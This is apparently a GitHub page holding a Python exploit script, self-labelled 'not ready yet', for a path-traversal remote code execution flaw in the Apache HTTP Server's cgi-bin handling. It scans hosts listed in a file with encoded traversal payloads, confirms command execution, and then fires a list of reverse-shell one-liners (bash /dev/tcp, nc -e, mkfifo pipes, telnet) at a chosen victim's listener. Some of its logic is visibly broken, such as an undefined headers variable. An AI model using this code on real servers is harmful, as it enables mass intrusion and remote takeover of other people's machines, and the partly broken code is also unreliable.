-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit2(notREADYyet).py
173 lines (159 loc) · 6.47 KB
/
exploit2(notREADYyet).py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
import urllib.request
import ssl
import sys
p_ip = []
e_ip = []
def poc(url):
plugin_list = [
"/cgi-bin/.%%32%65",
"/cgi-bin/%25%32%65",
"/cgi-bin/%25%32%65%32%65",
"/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65",
"/cgi-bin/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65",
]
headers = {"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1"}
p_list = []
for plugin_path in plugin_list:
try:
payload = url + plugin_path
data = bytes('echo Content-Type: text/plain; echo;id'.encode('utf-8'))
req = urllib.request.Request(url=payload, headers=headers, data=data)
res = urllib.request.urlopen(req, timeout=5)
code = res.getcode()
context = res.read()
if "uid" in context.decode('utf-8') and code == 200:
p_list.append(payload)
except Exception as e:
pass
if len(p_list) > 0:
p_ip.append(url)
def exp(url):
plugin_list = [
"/cgi-bin/.%%32%65",
"/cgi-bin/%25%32%65",
"/cgi-bin/%25%32%65%32%65",
"/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65",
"/cgi-bin/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65",
]
headers = {"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1"}
payload_lib = {}
for plugin_path in plugin_list:
try:
payload = url + plugin_path
data = bytes('echo Content-Type: text/plain; echo;id'.encode('utf-8'))
req = urllib.request.Request(url=payload, headers=headers, data=data)
res = urllib.request.urlopen(req, timeout=5)
code = res.getcode()
context = res.read()
if "uid" in context.decode('utf-8') and code == 200:
payload_lib[payload] = "Echo: " + context.decode('utf-8')
e_ip.append(url)
except Exception as e:
pass
if len(payload_lib) > 0:
print("RCE vulnerability found:")
print("------------Payload-----------\n")
for i in payload_lib:
print("Request line: {}".format(i))
print("Request body: echo Content-Type: text/plain; echo;id")
print("{}".format(payload_lib[i]).replace("\n", ""))
print()
print("-" * 30)
else:
print("No RCE vulnerability found for the target\n")
def real_exploit(url, lhost, lport):
print("Executing commands on the victim's PC...")
listen_ip = url.split("//")[1].split("/")[0].split(":")[0]
listen_port = url.split("//")[1].split("/")[0].split(":")[1]
commands = [
'bash -i >& /dev/tcp/{}/{lport} 0>&1'.format(listen_ip, lport=listen_port),
'0<&196;exec 196<>/dev/tcp/{}/{lport}; bash <&196 >&196 2>&196'.format(listen_ip, lport=listen_port),
'exec 5<>/dev/tcp/{}/{lport}; cat <&5 | while read line; do $line 2>&5 >&5; done'.format(listen_ip, lport=listen_port),
'bash -i 5<> /dev/tcp/{}/{lport} 0<&5 1>&5 2>&5'.format(listen_ip, lport=listen_port),
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {lhost} {lport} >/tmp/f'.format(lhost=lhost, lport=lport),
'nc {lhost} {lport} -e bash'.format(lhost=lhost, lport=lport),
'busybox nc {lhost} {lport} -e bash'.format(lhost=lhost, lport=lport),
'nc -c bash {lhost} {lport}'.format(lhost=lhost, lport=lport),
'TF=$(mktemp -u);mkfifo $TF && telnet {lhost} {lport} 0<$TF | bash 1>$TF'.format(lhost=lhost, lport=lport)
]
for command in commands:
try:
payload = url + command
data = bytes('echo Content-Type: text/plain; echo;{}'.format(command).encode('utf-8'))
req = urllib.request.Request(url=payload, headers=headers, data=data)
res = urllib.request.urlopen(req, timeout=5)
code = res.getcode()
context = res.read()
print("Command: {}".format(command))
print("Response:\n{}".format(context.decode('utf-8')))
print()
except Exception as e:
print("Command: {}".format(command))
print("Failed to execute command")
print()
def main():
_ip = []
with open("ip.txt", "r", encoding="utf-8") as f:
iplib = f.readlines()
i = 0
print('Running poc detection...')
for ip in iplib:
i += 1
try:
url = "http://{}".format(ip.replace("\n", ""))
print("Checking target {} [http]:".format(i))
print(url)
poc(url)
except Exception as e:
print('No vulnerabilities found for the target')
print(e)
try:
print("Checking target {} [https]:".format(i))
url = "https://{}".format(ip.replace("\n", ""))
print(url)
poc(url)
except Exception as e:
print('No vulnerabilities found for the target\n')
print()
v_list = list(set(p_ip))
print("-" * 30)
print("-" * 30)
print('Running exp detection...')
n = 0
for v in v_list:
n += 1
try:
url = "http://{}".format(v)
print("Checking target {} [http]:".format(n))
print(url)
exp(url)
except Exception as e:
print('No vulnerabilities found for the target')
print(e)
try:
print("Checking target {} [https]:".format(n))
url = "https://{}".format(v)
print(url)
exp(url)
except Exception as e:
print('No vulnerabilities found for the target\n')
if len(e_ip) > 0:
print('Number of hosts with RCE vulnerability: {}'.format(len(e_ip)))
while True:
host_num = input('Please select the host number to exploit (0 to exit): ')
if host_num == '0':
print('Exiting...')
sys.exit()
elif host_num.isnumeric() and int(host_num) in range(1, len(e_ip) + 1):
host = e_ip[int(host_num) - 1]
break
else:
print('Invalid input. Please try again.')
lhost = input('Please enter the listener IP: ')
lport = input('Please enter the listener port: ')
print('Exploiting host: {}'.format(host))
real_exploit(host, lhost, lport)
else:
print('No hosts with RCE vulnerability found.')
if __name__ == "__main__":
main()